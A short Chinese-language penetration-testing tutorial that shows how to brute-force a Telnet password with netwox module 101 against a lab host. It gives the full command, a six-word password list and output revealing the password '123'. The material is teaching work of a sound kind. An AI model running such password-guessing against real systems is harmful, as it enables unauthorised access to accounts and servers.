暴力破解Telnet服務

2020-07-16 10:05:14
遠端登入 Telnet 伺服器需要知道登入的使用者名稱和密碼。如果只知道使用者名稱而不知道密碼是無法登入的。在滲透測試中,就需要對密碼進行暴力破解。

netwox 工具提供了編號為 101 的模組,用於密碼暴力破解。

【範例】已知 Telnet 伺服器的 IP 地址為 192.168.59.135,登入使用者名稱為 sm。使用密碼字典 password.txt 進行暴力破解,獲取登入的密碼。

1) 檢視密碼字典 password.txt 中的密碼,執行命令如下:

[email protected]:~# cat /password.txt

輸出資訊如下:

admin
abc
19890106
123
ab12
root

以上輸出資訊顯示該密碼字典中有 6 個密碼。

2) 進行密碼暴力破解,執行命令如下:

[email protected]:~# netwox 101 -i 192.168.59.135 -L sm -w /password.txt

輸出資訊如下:
Trying(thread1) "sm" - "admin"    #嘗試使用密碼admin
Trying(thread2) "sm" - "abc"
Trying(thread3) "sm" - "19890106"
Trying(thread4) "sm" - "123"
Trying(thread5) "sm" - "ab12"
Couple(thread2) "sm" - "abc" -> bad
Trying(thread2) "sm" - "root"
Couple(thread1) "sm" - "admin" -> bad    #使用密碼admin進行匹配, 密碼錯誤
Couple(thread3) "sm" - "19890106" -> bad
Couple(thread5) "sm" - "ab12" -> bad
Couple(thread4) "sm" - "123" -> good    #使用密碼123進行匹配, 密碼正確
Couple(thread2) "sm" - "root" -> bad
輸出資訊顯示,嘗試使用密碼字典的所有密碼與使用者名稱進行匹配。如果密碼錯誤,將顯示 bad;如果密碼正確,則顯示 good。

這裡,暴力破解成功,Telnet 伺服器的登入密碼為 123。